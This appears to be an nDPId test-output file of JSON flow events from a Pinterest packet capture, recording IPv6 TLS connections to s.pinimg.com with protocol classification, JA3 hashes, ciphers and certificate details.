+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} 
+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinter
est.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.c
o.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
